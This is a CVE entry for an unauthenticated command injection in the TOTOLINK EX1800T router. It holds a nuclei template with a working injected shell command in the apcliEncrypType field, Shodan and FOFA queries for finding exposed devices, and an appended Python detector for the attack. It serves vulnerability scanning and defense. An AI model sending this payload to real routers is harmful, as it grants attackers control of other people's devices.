CVE-2024-34257: TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection

Date: 2025-08-01 | Affected software: TOTOLINK EX1800T | PoC: public

Vulnerability description

TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.

PoC code [public]

id: CVE-2024-34257

info:
  name: TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection
  author: pussycat0x
  severity: high
  description: |
    TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
  reference:
    - https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md
    - https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350
    - https://github.com/20142995/nuclei-templates
  classification:
    epss-score: 0.87328
    epss-percentile: 0.99416
  metadata:
    vendor: totolink
    product: a3700r_firmware
    shodan-query: http.title:"totolink"
    fofa-query: title="totolink"
    google-query: intitle:"totolink"
  tags: cve,cve2024,rce,unauth,vkev

variables:
  file: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /cgi-bin/cstecgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Referer: {{RootURL}}/page/index.html

        {
        "token":"",
        "apcliEncrypType":"`id>../{{file}}.txt`",
        "topicurl":"setWiFiExtenderConfig"
        }
      - |
        GET /{{file}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '"success": true'

      - type: regex
        part: body_2
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
# digest: 490a00463044022026bf5a6d64bd6725bb491c6383efb50c3ae410ca1038c39a8e0bdc200741351b02206bb1cc76d55f57942f7fae28d3115b4188d5dbaff6ce7c1ea1d97b6006a3594a:922c64590222798bb761d5b6d8e72950
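The template above has a recognisable two-step shape: a POST to /cgi-bin/cstecgi.cgi whose apcliEncrypType value carries shell metacharacters and redirects command output into a file, followed by a GET for that file. The detector below, an added example that is not part of the page or the nuclei project, flags both steps in a stream of parsed HTTP requests; the request-record layout (method, path, body) and the sample traffic are constructed assumptions.

```python
import json
import re
from typing import Optional

# Shell metacharacters that have no place in a Wi-Fi encryption-type value.
SHELL_META = re.compile(r"[`;|&\n]|\$\(")
# Output redirection inside the payload, e.g. `id>../abcdef.txt` -> "abcdef.txt".
REDIRECT_RE = re.compile(r">\s*(?:\.\./)*([\w.-]+)")

def classify(req: dict) -> Optional[str]:
    """Return the injected apcliEncrypType value if the request looks like the
    cstecgi.cgi command-injection attempt, else None."""
    if req.get("method") != "POST" or req.get("path") != "/cgi-bin/cstecgi.cgi":
        return None
    try:
        params = json.loads(req.get("body", ""))
    except ValueError:  # non-JSON body: not the pattern this detector covers
        return None
    if not isinstance(params, dict):
        return None
    value = params.get("apcliEncrypType")
    if isinstance(value, str) and SHELL_META.search(value):
        return value
    return None

def scan(requests: list) -> list:
    """Flag injection attempts and the follow-up GET that fetches the dropped output file."""
    alerts, pending = [], {}  # pending: dropped file name -> index of the injecting request
    for i, req in enumerate(requests):
        value = classify(req)
        if value is not None:
            alerts.append({"index": i, "reason": "apcliEncrypType command injection", "value": value})
            m = REDIRECT_RE.search(value)
            if m:
                pending[m.group(1)] = i
        elif req.get("method") == "GET" and req.get("path", "").lstrip("/") in pending:
            alerts.append({"index": i, "reason": "retrieval of injected command output",
                           "linked_to": pending[req["path"].lstrip("/")]})
    return alerts

# Constructed sample traffic (not captured from a real device); mirrors the PoC's two-step shape.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/cgi-bin/cstecgi.cgi", "body": json.dumps(
        {"token": "", "apcliEncrypType": "`id>../abcdef.txt`", "topicurl": "setWiFiExtenderConfig"})},
    {"method": "GET", "path": "/abcdef.txt", "body": ""},
    {"method": "POST", "path": "/cgi-bin/cstecgi.cgi", "body": json.dumps(
        {"token": "", "apcliEncrypType": "AES", "topicurl": "setWiFiExtenderConfig"})},
    {"method": "GET", "path": "/page/index.html", "body": ""},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(alert)
```

The benign third request (a plain encryption-type value) is left alone, so the rule keys on metacharacters in the parameter rather than on the endpoint itself.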
